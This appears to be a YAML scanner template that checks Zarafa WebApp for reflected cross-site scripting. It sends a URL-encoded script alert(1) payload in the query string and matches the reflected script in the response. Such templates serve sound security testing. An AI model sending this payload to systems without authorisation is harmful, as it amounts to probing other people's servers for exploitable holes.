id: zarafa-xss
info:
  name: Zarafa XSS
  risk: Medium

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: true
    url: >-
     {{.root}}/webapp/?fccc0%22%3E%3Cscript%3Ealert(1)%3C/script%3E5f43d=1
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch('response', '<frameset') && StringSearch('response', 'script%3Ealert(1)%3C/script') && StringSearch('resHeaders', 'Redirector')
